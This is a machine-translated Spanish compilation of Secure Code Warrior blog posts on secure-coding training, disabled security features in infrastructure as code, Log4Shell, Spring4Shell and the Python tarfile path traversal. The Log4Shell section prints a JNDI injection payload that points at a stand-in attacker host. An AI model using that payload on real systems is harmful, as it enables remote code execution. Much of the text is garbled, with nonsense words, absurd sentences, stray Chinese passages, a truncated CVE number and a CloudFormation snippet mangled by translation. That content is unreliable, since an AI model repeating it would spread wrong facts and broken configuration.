Perspectivas sobre el código de seguridad

La fórmula fiable para mejorar la seguridad de una organización consiste en fomentar las habilidades de los desarrolladores en las mejores prácticas de codificación y descodificación seguras, que incluyen las arquitecturas proporcionadas en los puntos de referencia y las arquitecturas de referencia, y que constituyen la vía de aprendizaje formal que necesitan los desarrolladores. Sin embargo, la codificación y descodificación seguras no son una solución puntual, sino que deben convertirse en una forma de codificar y descodificar el ADN de la organización. Los desarrolladores no solo deben moverse hacia la izquierda o hacia la derecha, sino que también deben mantenerse en movimiento hacia la izquierda.

No basta con ofrecer formación. Las organizaciones deben asegurarse de que los desarrolladores hayan asimilado completamente su trabajo y que lo incorporen como parte de sus tareas diarias en el ciclo de vida del desarrollo de software (SDLC), lo cual constituirá una práctica recomendada. Realice un seguimiento de la eficiencia de los empleados y evalúe su progreso en función de los estándares internos y los parámetros de referencia del sector, lo que le permitirá medir eficazmente el retorno de la inversión en formación.

El código de seguridad Warrior Messenger Score proporciona a los desarrolladores visibilidad sobre la eficiencia de los usuarios individuales y recopila datos para evaluar el sistema global de la organización. Muestra la mejora de la eficacia en los programas de alta tecnología, al tiempo que confirma las áreas que necesitan mejoras y avances. Además, ayuda a cumplir con precisión los requisitos de un sistema de supervisión de canales, ya sean los del Reglamento General de Protección de Datos (RGPD), la certificación de seguridad de datos de la industria de tarjetas de pago (PCI DSS) (PCI DSS), la Ley de Privacidad del Consumidor de California (CCPA) u otras.

Nuestra investigación demuestra que la formación en códigos de seguridad es eficaz. Trust Score utiliza un algoritmo que aprovecha más de 20 millones de puntos de datos de aprendizaje obtenidos en el trabajo por más de 250 000 académicos de más de 600 organizaciones, lo que demuestra su eficacia en la reducción de vulnerabilidades a baja velocidad y cómo hacer que el programa sea más eficaz.

La formación puede mejorar la seguridad: si los desarrolladores participan en conversaciones entre personas blancas.

Durante muchos años, en la industria del software, lo ideal ha sido utilizar las mejores prácticas de seguridad desde el inicio del ciclo de vida del desarrollo de software (SDLC). Sería bueno poder hacerlo algún día, pero no es una prioridad en la actualidad. Sin embargo, la aceleración constante de la velocidad de desarrollo de software y el aumento de la complejidad y la destructividad de los ataques cibernéticos (que suelen basarse en vulnerabilidades de software específicas) hacen que las variables de codificación y descodificación de seguridad sean extremadamente importantes. La Agencia de Seguridad Cibernética y de Infraestructuras (CISA) (CISA) ha puesto el código seguro en primer plano y en el centro de su iniciativa «Diseñar para la seguridad», que se está convirtiendo en un movimiento internacional.

Nuestra investigación ha demostrado que existe una correlación evidente entre los métodos de diseño seguro y la reducción de vulnerabilidades en el software. Analizamos una pequeña muestra de datos sobre la reducción de vulnerabilidades procedente del 26 % de la base de clientes de SCW y descubrimos que la formación de los desarrolladores en el software de Mision redujo las vulnerabilidades entre un 22 % y un 84 %.. Este rango se debe a variables como la simulación de las empresas involucradas (los desarrolladores son, por el contrario, una conclusión de las pequeñas empresas) y el grupo de estudio es un experto que se centra en un problema específico (en este caso, la eliminación de sus defectos es más alta).

En comparación, las grandes empresas tienen un negocio bastante estable. Gracias a la mejora de las habilidades de los desarrolladores en materia de políticas de seguridad, se prevé que las empresas con 7000 o más desarrolladores reduzcan las vulnerabilidades entre un 47 % y un 53 %. Por ejemplo, una empresa con una plantilla de desarrolladores por encima de la media (que no tiene un buen rendimiento en la plataforma ni es la empresa con la puntuación más alta) ha reducido las vulnerabilidades en un 53 %.

Por supuesto, la formación más eficaz no será la que adopte un enfoque general y único para todos. Deberá adaptarse al entorno de trabajo de los desarrolladores y a su tipo de desarrollo.

Las empresas deben establecer primero las habilidades básicas que deben poseer los desarrolladores, de modo que escribir código seguro sea tan natural como escribir código. Las habilidades que se pueden mejorar deben incluir la agilidad en la manipulación práctica en situaciones reales, de modo que se adapten al tipo de trabajo que realizan y al lenguaje que utilizan. Además, debe ser una vida inspiradora, en la que se puedan incorporar cursos de formación a su agenda de trabajo.

Para los desarrolladores, esta tecnología no solo permite integrar código de programación. Necesitan poder revisar el contenido creado por asistentes de inteligencia artificial y terceros, como repositorios de código abierto. Los desarrolladores han utilizado con éxito plantillas de IA generadas por modelos bioquímicos y, en general, elogian sus ventajas a la hora de ayudarles a crear más código más rápido.Sin embargo, aunque el 76 % de los encuestados en la encuesta de Snyk afirma que el código generado por IA funciona mejor que el código generado por humanos, el 56,4 % afirma que la IA a veces o con frecuencia comete errores. La misma encuesta revela que el 80 % de los desarrolladores omite aplicar políticas de seguridad de código de IA, lo que indica que los problemas de código de IA no se están resolviendo.

Al adoptar la metodología Secure-by-Design, los desarrolladores (en colaboración con el equipo de seguridad, en lugar de trabajar por separado) resolverán estos problemas en las primeras fases del SDLC, antes de que el código se introduzca en procepricensiteFrengeme y se corrijan los defectos.

La puntuación del mensajero mide la eficiencia de las personas y las empresas.

La formación continua también es fundamental. Las empresas deben adoptar una cultura que anteponga la seguridad, aplicable a todos los niveles, desde la alta dirección hasta los niveles más bajos. Esta cultura se mejora mediante la aplicación de las mejores prácticas de seguridad en todo el ciclo de vida del desarrollo de software (SDLC). La tecnología y la ciberdelincuencia no dejan de evolucionar, por lo que la ciberseguridad tampoco debe quedarse atrás. Para proscSoftware, los desarrolladores con formación en seguridad son la piedra angular.

Por eso secremintunctrictrencTrics ha dejado de ser válido. Zazagen y la formación son igual de importantes. La puntuación de confianza no solo permite conocer la eficiencia de los desarrolladores a nivel individual y de toda la organización, sino que también permite a la organización profundizar en los datos de eficiencia, centrándose en idiomas, equipos de desarrollo o categorías de software específicos. Los datos de resultados de «conclusiones de eficiencia» y «resúmenes» también son útiles, ya que permiten determinar las áreas que necesitan mejorar, por ejemplo, la formación no ha tenido el impacto esperado en el trabajo diario de los desarrolladores. «Conclusiones sobre la eficiencia» y «Resumen» también son útiles, ya que permiten determinar las áreas que deben mejorarse, por ejemplo, cuando la formación no tiene el efecto deseado en el trabajo diario de los desarrolladores.

La puntuación de confianza permite a las organizaciones evaluar la eficacia de los desarrolladores, confirmar si han adquirido y están utilizando las habilidades de seguridad necesarias y, por lo tanto, confirmar que están preparados. Esto puede permitir a las organizaciones conceder con confianza a los desarrolladores cualificados acceso a sus datos más sensibles y a permisos de software críticos, al tiempo que se deniega el acceso a aquellos desarrolladores que utilizan herramientas pero no están preparados.

Cultura de seguridad en constante cambio

La ciberseguridad no es solo una cuestión de seguridad. Es una cuestión empresarial que afecta a la integridad del activo más valioso de muchas organizaciones: sus datos. Las vulnerabilidades graves pueden afectar al funcionamiento y la reputación de una organización, y pueden incluso poner en peligro su supervivencia. Las autoridades reguladoras no han pasado por alto la importancia de la ciberseguridad y han ido aplicando normativas cada vez más estrictas, mostrándose dispuestas a advertir a los directores de seguridad de la información y a otros altos cargos, e incluso a presentar cargos penales, como en los siguientes casos: Uber y SolarWinds.

En el entorno actual, es fundamental abordar la seguridad y la cultura dentro de las empresas. Además, dado que muchas personas valiosas de la empresa han cancelado sus datos, aplicaciones y servicios, el códec Safire es un elemento central de esta cultura. La formación específica y las habilidades que se pueden mejorar forman parte de la mentalidad cultural, y si se combinan con la formación de asistentes para modificar el contenido cultural variable, las organizaciones pueden emprender el camino hacia una actitud más segura.

El programa de seguridad impulsado por los desarrolladores es valioso. Se dice que en él se incluye la puntuación de Messenger.

Hoy en día, las amenazas a la seguridad cibernética son omnipresentes y constantes. A medida que más y más aspectos de nuestras vidas se digitalizan, los ciberdelincuentes se enfrentan a un riesgo cada vez mayor: hay demasiado código que no se puede garantizar que sea seguro y los datos privados son demasiado valiosos. Además, bueno, es casi imposible intentar mantenerse al día y defender todos los aspectos de la superficie de ataque después de implementar un programa.

Hay algunas formas de mitigar algunos de estos síntomas, y una de ellas resulta evidente cuando las organizaciones inteligentes adoptan el concepto de infraestructura como código (IaC). Por supuesto, como en cualquier desarrollo, hay algunas trampas de seguridad que deben resolverse. Además, dado que los desarrolladores están generando código para la infraestructura crítica que aloja las aplicaciones, la concienciación sobre la seguridad es fundamental en cada etapa del proceso.

Entonces, ¿cómo pueden los desarrolladores que acaban de entrar en contacto con el entorno de los servidores en la nube mejorar sus habilidades, aprender nuevas habilidades y construir con una mayor conciencia de la seguridad? Hemos creado la próxima serie de Coders Conquer Security para abordar las vulnerabilidades comunes de IaC. Las próximas entradas del blogse centrarán en los pasos que tú (desarrollador) puedes seguir para empezar a implementar una infraestructura de seguridad en forma de código en tu organización.

Empecemos.

En el antiguo oeste americano hay una fábula que cuenta la historia de un hombre paranoico que creía que los bandidos iban a asaltar y robar su casa. Como compensación,invirtió en diversas medidas de seguridad, como instalar una puerta principal ultrarresistente, blindar todas las ventanas y tener un montón de armas a mano. Una noche, mientras dormía, le robaron porque se había olvidado de cerrar la puerta lateral. Los ladrones solo tuvieron que encontrar el sistema de seguridad defectuoso y aprovecharon rápidamente la situación.

Desactivar las funciones de seguridad en la infraestructura es como esto. Aunque su red cuente con una infraestructura de seguridad sólida, si se desactivan los elementos, no servirá de nada.

Antes de sumergirnos, permítanme plantear un desafío:

Al acceder al enlace anterior, se le redirigirá a nuestra plataforma de formación gamificada, donde podrá probar inmediatamente cómo superar las vulnerabilidades de las funciones de seguridad desactivadas. (Nota: se abrirá en Kubernetes, pero mediante el menú desplegable podrá elegir entre Docker, CloudFormation, Terraform y Ansible).

¿Cómo te ha ido? Si aún te queda trabajo por hacer, sigue leyendo:

Las funciones de seguridad pueden desactivarse por diversas razones. En el caso de algunas aplicaciones y marcos, es posible que estén desactivadas de forma predeterminada y que sea necesario activarlas antes de poder empezar a trabajar. Los administradores también pueden desactivar determinadas funciones de seguridad para facilitar la ejecución de ciertas tareas sin tener que enfrentarse a retos o bloqueos frecuentes (por ejemplo, hacer públicos los buckets de AWS S3). Una vez finalizado el trabajo,puede que se olviden de reactivar las funciones desactivadas. También es posible que prefieran mantenerlas desactivadas para facilitar el trabajo en el futuro.

¿Por qué son tan peligrosas las funciones de seguridad desactivadas?

Desactivar una o varias funciones de seguridad no es recomendable por dos razones. En primer lugar, las funciones de seguridad se implementan en los recursos de infraestructura para protegerlos contra vulnerabilidades, amenazas o fallos conocidos. Si se desactivan, no podrán proteger sus recursos.

Los atacantes siempre intentan primero encontrar vulnerabilidades fáciles de explotar, e incluso pueden utilizar scripts para corregir vulnerabilidades comunes. Esto no difiere mucho de lo que hace un ladrón cuando revisa todos los coches de la calle para ver si alguna puerta está abierta, lo cual es mucho más fácil que romper una ventana. Los hackers pueden sorprenderse al descubrir que las medidas de seguridad comunes están desactivadas. Sin embargo, cuando esto ocurre, no tardan en aprovecharlo.

En segundo lugar, configurar una buena seguridad y luego desactivarla genera una falsa sensación de seguridad. Si los administradores no saben que alguien ha desactivado estas defensas, pueden pensar que están a salvo de las amenazas comunes.

Como ejemplo de cómo un atacante puede aprovechar las funciones de seguridad desactivadas, consideremos la función de seguridad de AWS S3 que bloquea el acceso público. Con Amazon S3 Block Public Access, los administradores de cuentas y los propietarios de buckets pueden configurar fácilmente un control centralizado para restringir el acceso público a sus recursos de Amazon S3.Sin embargo, algunos administradores tienen problemas para acceder a los buckets de S3 y deciden hacerlos públicos para poder completar sus tareas lo antes posible. Si se olvidan de habilitar la función de seguridad, los atacantes tendrán acceso completo a la información almacenada en el bucket de S3, lo que no solo provocará una fuga de información, sino que también generará gastos adicionales por los costes de transferencia de datos.

Comparemos algunos códigos del mundo real; veamos el siguiente fragmento de CloudFormation:

Vulnerable:

Bucket de almacenamiento empresarial:
Tipo: AWS:: S3:: Bucket
Atributos:
Configuración de bloque de acceso público:
blockPublicACLS: error
BlockPublicy: error
ignorepublicacls: error
restrictPublicBuckets:
Configuración de control de versiones:
Estado: habilitado
Cifrado de bucket:
Configuración de cifrado del lado del servidor:
- Cifrado del lado del servidor predeterminado:
Algoritmo SSE: «AES256»

Seguridad:

Bucket de almacenamiento empresarial:
Tipo: AWS:: S3:: Bucket
Propiedades:
Configuración de bloqueo de acceso público:
blockPublicACLS: Sí
BlockPublicy: Sí
ignoreRepublicacls:
restrictPublicBuckets:
Configuración de control de versiones:
Estado: Activado
Cifrado del bucket:
Configuración de cifrado del lado del servidor:
- Cifrado del lado del servidor por defecto:
Algoritmo SSE: «AES256»

Prevenir la desactivación de funciones de seguridad

Impedir que las funciones de seguridad desactivadas causen daños negativos a su organización es tanto una cuestión de política como de práctica. Se debe establecer una política firme que establezca que las funciones de seguridad solo se pueden desactivar en circunstancias muy especiales. Se deben registrar los incidentes en los que sea necesario desactivar temporalmente una función para resolver un problema o actualizar una aplicación. Una vez completado el trabajo necesario, se debe comprobar que la función se ha reactivado por completo.

Si es necesario desactivar permanentemente una función de seguridad para simplificar el funcionamiento, se deben proporcionar otras medidas de protección para los datos afectados, a fin de garantizar que los piratas informáticos no puedan acceder a la función sin la protección predeterminada. Si se ha desactivado la función de protección necesaria, es solo cuestión de tiempo que los atacantes encuentren una puerta sin cerrar y aprovechen la situación.

Más información, desafíate a ti mismo:

Visite la página del blog de Security Code Warrior para obtener más información sobre esta vulnerabilidad y sobre cómo proteger a su organización y a sus clientes frente a otras vulnerabilidades y fallos de seguridad.

Ahora que ya has leído este artículo, ¿estás listo para descubrir y corregir esta vulnerabilidad? Es horade probar el desafío de seguridad gamificado de iMac en Secure Code Warrior podrás perfeccionar y mantener al día todas tus habilidades en ciberseguridad.

Esta es una serie semanal que cubre nuestras ocho vulnerabilidades principales de «infraestructura como código». ¡Vuelve la semana que viene para obtener más información!

En una entrada anterior del blog se describían las trampas de Java: «Operadores bit a bit y operadores booleanos».

• Java: Trampas - Operadores bit a bit y operadores booleanos

Hemos añadido esta variante y otras trampas de Java a un divertido cuestionario llamado «Challenge The Sensei

• scw.typeform.com/to/rgw7q7oe

Si ya has leído la entrada del blog anterior, entonces estarás en un buen lugar para responder al menos una pregunta.

Pero es posible que tus amigos no lo hagan, así que si te parece interesante el test, puedes compartirlo con ellos y ver si obtienen la misma puntuación que tú.

Porque no queremos solo preguntarte. Queremos intentar utilizarlo para ayudar a educar y recopilar conocimientos. Por lo tanto, hemos creado un repositorio de Github que contiene ejemplos de código ejecutable con preguntas y soluciones.

• github.com/secureCodeWarrior/Challenge-the-

Este es un repositorio habilitado por un profesor.

Cuando clonas el repositorio y lo cargas en IntelliJ, si tienes instalado el complemento IntelliJ Secure Code Warrior Sensei, este detectará automáticamente que tienes unasensei Sensei

Al examinar el código en el IDE, debería ver que IntelliJ le avisa de la presencia de errores en el código, lo que debería facilitar la detección de problemas en el código:

• Coloca el cursor sobre el código resaltado y verás una sugerencia que te indicará el error.
• Al usar la tecla «Mostrar contexto de operación»: Alt+Intro (Windows) Opción+Intro (macOS), es posible que tengamos una solución rápida para corregir el código.

Se ha añadido la receta Sensei :

• Operador bit a bit
• Dividir direcciones IP
• Pedido de afirmación

En el futuro añadiremos más recetas y más texto explicativo para cubrir el resto del código... pero no dejes que eso te impida revisar el código y encontrar errores.

Recuerda probar el test y luego«desafiaralprofesor».

El 9 de diciembre se reveló una vulnerabilidad de 0 días en la biblioteca Java Log4j. CVE-44228, apodadaLog4Shell, recibió una calificación de «alta gravedad» (competición) debido a que la vulnerabilidad podríapermitir la ejecución remota de código. Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.

¿Quieres mejorar rápidamente tus habilidades para manejar Log4Shell?

Hemos creado una vitrina que le llevará desde los conceptos básicos de Log4Shell hasta la experiencia de aprovechar esta vulnerabilidad en un simulador llamado Mission. En esta misión, le guiaremos para que comprenda cómo la vulnerabilidad de Log4j afecta a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la vitrinao siga leyendo para obtener más información sobre la vulnerabilidad.

¿Noticias viejas?

Esta vulnerabilidad no es nada nuevo. Los investigadores de seguridad ya lo destacaron en la conferencia BlackHat de 2016. Álvaro Muñoz y Oleksandr Miroshseñalaron que «las aplicaciones no deben utilizar datos no fiables para ejecutar consultas JNDI» yexplicaron cómo una inyección JNDI/LDAP dirigida puede dar lugar a la ejecución remota de código. Y eso es precisamente el núcleo de Log4Shell.

Vector de ataque

La carga inyectada por Log4Shell es la siguiente:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点，我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式： $ {expr} 将在运行时进行评估。例如，$ {java: version} 将返回正在使用的 Java 版本。

A continuación viene JNDI, o Java Naming and Directory Interface,una API que permite conectarse a servicios mediante protocolos como LDAP, DNS o RMI para recuperar datos o recursos. En resumen, en el ejemplo anterior de carga maliciosa, JNDI realiza una consulta al servidor LDAP controlado por el atacante. Por ejemplo, su respuesta podría apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutaría en el servidor vulnerable.

La vulnerabilidad es tan problemática porque Log4j evalúa todas las entradas de registro y consulta todas las entradas de usuario registradas escritas con sintaxis EL que comienzan por «jndi». Se puede inyectar una carga útil en cualquier lugar donde el usuario pueda introducir datos, como los campos de un formulario. Además, los encabezados HTTP, como User-Agent y X-Forwarded-For, así como otros encabezados, se pueden personalizar para transportar la carga útil.

Para experimentar personalmente las vulnerabilidades, diríjase a nuestra zona de exposición y pase al paso 2: «Experimente el impacto».

Prevención: Concienciación

Se recomienda actualizar todas las aplicaciones, ya que Log4j ha estado corrigiendo el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contienen vulnerabilidades DDoS y otras, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.

Cuando los desarrolladores escriben código, debemos tener siempre en cuenta la seguridad. Log4Shell nos enseña que el uso de marcos o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que el uso de recursos externos puede comprometer la seguridad de nuestras aplicaciones, aunque ingenuamente pensemos que dichos recursos son seguros.

¿Se puede prevenir esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores solo pueden hacer más si se introducen componentes vulnerables a través de software de terceros. Por otro lado, la lección que se aprende de esto se repite una y otra vez: nunca se debe confiar en las entradas de los usuarios.

Secure Code Warrior cree que los desarrolladores con conciencia de seguridad son la mejor manera de prevenir las vulnerabilidades del código. Dado que SCW ofrece formación a gran escala sobre marcos de programación específicos, los clientes empresariales pueden utilizar los datos de los informes para identificar rápidamente a los desarrolladores Java afectados. También cuentan con el apoyo de expertos en seguridad formados por SCW para acelerar la actualización de Log4j.

EspecialmenteSecure Code Warrior los desarrolladores de Java,Secure Code Warrior Senseicomplemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para hacer cumplir las directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestras reglas ya preparadas, las recetas. Explore nuestras recetas y noolvide descargar nuestra receta Log4j, que le ayudará a encontrar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.

Mejora tus habilidades para defenderte de Log4Shell.

¿Le interesa poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la demostración, podrá echar un vistazo rápido a esta vulnerabilidad y, a continuación, se le guiará a un entorno simulado donde podrá probar la vulnerabilidad siguiendo las instrucciones.

‍

Recientemente, Spring, una de las bibliotecas más populares de la comunidad Java, ha revelado dos vulnerabilidades relacionadas con la ejecución remota de código (RCE). Para ayudarle a comprender más fácilmente si está expuesto a estas vulnerabilidades y qué medidas debe tomar, hemos desglosado la información conocida sobre «Spring4Shell» y «Spring Cloud Function».

Vulnerabilidad 1: «Spring4Shell» (CVE-2022-22965)

El 29 de marzo de 2022, la comunidad descubrió una serie de tuits que incluían capturas de pantalla de una prueba de concepto de una vulnerabilidad en Spring Core (SC) que permitía la ejecución remota de código en todas las versiones de Spring Core, incluida la versión 5.3.17, recientemente publicada.

¿Qué aplicaciones están en riesgo?

Por el momento, solo se ha confirmado que las aplicaciones alojadas en Tomcat están expuestas a esta nueva vulnerabilidad. Aunque aún no se ha demostrado que los ataques contra el contenedor Tomcat Servlet integrado o cualquier otra aplicación no alojada en Tomcat hayan tenido éxito, esto no descarta la posibilidad de que estos marcos se utilicen con éxito en el futuro.

En primavera se publicó un comunicado oficial sobre esta vulnerabilidad. Según el conocimiento actual sobre la misma, se ha aclarado que para que se produzca un ataque deben cumplirse las siguientes condiciones:

• JDK 9 o superior
• Apache Tomcat como contenedor de servlets
• Empaquetado en WAR tradicional (a diferencia del archivo jar ejecutable de Spring Boot).
• Dependencias de Spring-webmvc o Spring-webflux
• Spring Framework versiones 5.3.0 a 5.3.17, 5.2.0 a 5.2.19 y versiones anteriores.

¿Cómo funciona la vulnerabilidad «Spring4Shell»?

La vulnerabilidad depende del uso de «enlace de datos» (org.springframework.web.bind.Web.bind.WebDataBinder) en solicitudes que utilizan objetos Java comunes (POJO) en la firma del método:

La clase Foo es una clase POJO y se puede definir de la siguiente manera. Tenga en cuenta que la clase real no es importante, siempre y cuando sea cargada por el cargador de clases.

Cuando la solicitud se procesa mediante este método, el cargador de clases se utiliza para resolver la clase. El cargador de clases se encarga de cargar las clases en tiempo de ejecución, sin necesidad de precargar todos los tipos posibles en la memoria. Calcula qué archivo .jar debe cargarse cuando se utiliza una nueva clase.

Puede encontrar información actualizada y detallada sobre esta vulnerabilidad directamente en Spring, en una entradade blogque incluye posibles soluciones o alternativas.

Vulnerabilidad 2: Función Spring Cloud (CVE-2022-22963)

El 27 de marzo de 2022, Cyber Kendra reveló detalles sobre una vulnerabilidad de ejecución remota de código (RCE) de día cero en Spring Cloud Functions, para la que aún no existe ningún parche. A la vulnerabilidad se le ha asignado el ID CVE-2022-22963: Vulnerabilidad de acceso a recursos de expresiones Spring.

¿Qué aplicaciones están en riesgo?

该漏洞影响了以下条件下的应用程序：

• JDK 9 o superior
• Spring Cloud Functions versión 3.1.6 (o inferior), 3.2.2 (o inferior) o cualquier versión no compatible.

¿Cómo funciona la explotación?

Spring Cloud Function permite a los desarrolladores configurar cómo se procesa el enrutamiento mediante la propiedad spring.cloud.function.routing-expression, lo que normalmente se realiza mediante la configuración o el código. Se trata de una forma de aprovechar el potente lenguaje «Spring Expression Language» (SpEL). A través de esta vulnerabilidad de 0 días, hemos descubierto que esta propiedad se puede configurar mediante el encabezado HTTP de la solicitud, lo que significa que un atacante puede incrustar código SpEL directamente en la solicitud HTTP de su punto final RoutingFunction y, de este modo, ejecutar código arbitrario.

¿Qué medidas deben tomar los usuarios para reducir el riesgo?

En primavera se publicaron las versiones 3.1.7 y 3.2.3, que solucionan este problema al no permitir la configuración de esta propiedad a través de la cabecera HTTP, lo que mitiga la vulnerabilidad. Tras actualizar a cualquiera de estas versiones, no es necesario realizar ningún otro paso.

¿Le interesa saber más sobre cómo ayudamos a los desarrolladores a escribir código más seguro?Reserve una demostración o consulte nuestra guía gratuita de programación segura, Security Code Coach.

‍

Fuente de datos

• https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
• https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/

‍

Recientemente, un grupo de investigadores de seguridad anunció que había descubierto un error de quince años de antigüedad en la función de extracción de archivos tar de Python. La vulnerabilidad se reveló por primera vez en 2007 y se identificó con el número CVE-2007-4559. Se añadió una nota en la documentación oficial de Python, pero el error en sí no se corrigió.

Esta vulnerabilidad puede afectar a miles de proyectos de software, pero muchas personas no están familiarizadas con la situación ni saben cómo abordarla. Por eso, en Security Code Warrior, le ofrecemosla oportunidad de simular personalmente el aprovechamiento de esta vulnerabilidad para que pueda ver sus efectos con sus propios ojos y experimentar de primera mano el mecanismo de este error persistente, ¡de modo que pueda proteger mejor sus aplicaciones!

Prueba la simulación Misión ahora.

Vulnerabilidad: Recorrido de rutas durante la extracción de archivos tar

Cuando se utilizan entradas de usuario sin revisar para construir rutas de archivo, se produce un recorrido de rutas o directorios, lo que permite a los atacantes obtener acceso y sobrescribir archivos, o incluso ejecutar código arbitrario.

La vulnerabilidad se encuentra en el módulo tarfile de Python. Los archivos tar (archivos de cinta) son archivos únicos denominados «archivos». Agrupan varios archivos y sus metadatos, y suelen identificarse con la extensión .tar.gz o .tgz. Cada miembro del archivo puede representarse con un objeto TarInfo, que contiene metadatos como el nombre del archivo, la hora de modificación, la propiedad, etc.

El riesgo proviene de la posibilidad de volver a extraer los archivos.

Al extraer, cada miembro debe escribir la ruta. Esta ubicación se crea conectando la ruta básica con el nombre del archivo:

Una vez creada esta ruta, se pasará a tarfile.extra o tarfile.extall para ejecutar la función de extracción:

El problema aquí es la falta de limpieza de los nombres de los archivos. Los atacantes pueden renombrar los archivos para incluir caracteres de recorrido de ruta, como barras inclinadas (../), lo que provocará que los archivos se salgan del directorio en el que deberían estar y sobrescriban cualquier archivo. Esto podría acabar provocando la ejecución remota de código, y el momento para aprovecharlo ya ha llegado.

Si sabes cómo identificar esta vulnerabilidad, verás que aparece en otros contextos. Además del procesamiento de archivos tar por parte de Python, esta vulnerabilidad también existe en la extracción de archivos zip. Quizás la conozcas con otro nombre, como «vulnerabilidad de archivos comprimidos», ¡que ya se ha reflejado en otros lenguajes además de Python!

Enlace a la tarea 

¿Cómo reducir el riesgo?

Aunque esta vulnerabilidad se conoce desde hace años, los mantenedores de Python siguen considerando que la función de extracción funciona como debería. En este caso, se podría argumentar que «se trata de una función, no de un error». Por desgracia, los desarrolladores no siempre pueden evitar extraer archivos tar o zip de fuentes desconocidas. Como parte de las prácticas de desarrollo seguro, tienen la responsabilidad de limpiar las entradas no fiables para evitar vulnerabilidades de recorrido de rutas.

¿Quieres saber más sobre cómo escribir código seguro y reducir riesgos con Python?

Prueba nuestro desafío gratuito de Python.

Si está interesado en obtener más guías de programación gratuitas, consulte el Entrenador de código seguro para dominar las prácticas de codificación segura.

‍

‍

Micha Martínez es analista de ciberseguridad y director de fotografía en Nelnet, una empresa estadounidense dedicada a la gestión y el reembolso de préstamos estudiantiles y servicios financieros para la educación. Cuando se encargó de crear un programa de formación sobre codificación segura para desarrolladores, utilizó un enfoque creativo para atraer al equipo. Nos impresionó su forma de llevar a cabo el programa de formación sobre código seguro, por lo que nos sentamos con él para saber más.

¿El resultado final?

Crear una cultura de seguridad, formar defensores internos de la seguridad en los equipos de desarrollo y «convertirse en una fuerza del bien».

«Al centrarnos en el código de seguridad, ayudamos a las empresas a ser más fuertes y seguras».

En Nelnet, Micha y su equipo de seguridad comprendieron desde el principio la importancia de crear un código de seguridad. Querían hacerlo de una manera atractiva, relevante y útil.Descubrió que, al identificar a los desarrolladores con un gran interés y dominio de la codificación segura y formarlos para que se convirtieran en defensores de la seguridad, estos defensores se convirtieron en catalizadores de toda la mentalidad de formación en seguridad. Estas personas orientan a los compañeros que necesitan ayuda individualizada y se convierten en líderes de la implementación de cambios en las prácticas de código seguro dentro de la organización.

A continuación, Micha nos cuenta cómo él y su equipo cambiaron la mentalidad y la cultura en torno a la seguridad para hacer que su empresa fuera «más fuerte y más segura».

Todo tiene que ver con el derecho a fanfarronear... y con reducir las vulnerabilidades.

Micha no lleva a cabo programas de formación en seguridad convencionales. Aprovecha la competitividad y su talento fotográfico para hacer que los concursos sean muy atractivos y tengan éxito. Los desarrolladores obtienen conocimientos prácticos muy relevantes que les permiten generar códigos de seguridad más potentes.

A medida que sus productos se vuelven más seguros y ofrecen un mayor nivel de protección contra vulnerabilidades de software, la empresa también ha obtenido grandes logros. Aprender sobre seguridad de software no tiene por qué ser una experiencia típica y aburrida, que se reduce a marcar casillas. Los desarrolladores desean una experiencia de formación inmersiva, estimulante y relevante para su trabajo diario.

Micha explica cómo ha conseguido que la formación en programación segura resulte divertida mediante competiciones, con premios como cinturones de campeón físico y entradas para WrestleMania. Para que su equipo dé prioridad a la seguridad, solo hace falta una sana competencia.

¿A quién no le gusta el derecho a fanfarronear?

‍

Aceptar una cultura centrada en la codificación segura... Esta herramienta no es suficiente.

Micha nos dejó con una última reflexión sobre por qué recomienda Secure Code Warrior. La plataforma es una herramienta que le ha ayudado a crear una cultura preventiva y un aprendizaje proactivo. Desarrollar un programa de formación lleva tiempo y requiere invertir en desarrolladores bien formados y con buen rendimiento. Se necesita una cultura transformadora para fomentar las habilidades de cada desarrollador en la adopción de un enfoque preventivo para la codificación segura.

A continuación, Micha nos cuenta por qué adoptar una cultura de programación segura Secure Code Warrior

Secure Code Warrior los desarrolladores una plataforma de aprendizaje de código seguro inmersiva y atractiva. ¿Le interesa una demostración? Reserve una a continuación.

Nos sentamos con Larry Maccherone, líder en seguridad y modernizaciónde aplicaciones, para compararcómo el análisis de código y la defensa contra ataques se integran directamente en el software. Hablamos de cómo el aprendizaje contextual puede formar con éxito a los desarrolladores en la codificación segura.

Los desarrolladores actuales tienen cada vez más la responsabilidad de evitar las vulnerabilidades de ciberseguridad del futuro. Aunque se puede ofrecer formación sobre vulnerabilidades de código, esta suele presentarse de una forma poco atractiva y sin relación con el trabajo diario de los desarrolladores. Los desarrolladores necesitan escribir código rápidamente para satisfacer las necesidades de los clientes, lo que retrasa objetivos empresariales como la formación.Además, cuando esta formación se ofrece fuera de contexto y en forma de largas presentaciones o manuales de aprendizaje, resulta aún más difícil apreciar los beneficios que puede aportar este esfuerzo adicional.

¿Cómo puede una organización proporcionar formación clave en materia de seguridad a los desarrolladores sin interferir en sus responsabilidades diarias ni alejarlos de sus herramientas y flujos de trabajo preferidos?

La respuesta es muy sencilla. Mediante el aprendizaje contextual, los desarrolladores tienen la formación al alcance de la mano. Larry explica en el siguiente vídeo por qué es tan eficaz para los desarrolladores.

Al integrar oportunidades de formación mientras los desarrolladores revisan los problemas del código, pueden obtener inmediatamente la información más relevante sobre los problemas o vulnerabilidades detectados. Además, dado que la formación se imparte en bloques más pequeños y fáciles de entender, es más probable que los desarrolladores retengan la información y eviten utilizar código vulnerable en el futuro. Como dice Larry, «la retroalimentación es la clave del aprendizaje».

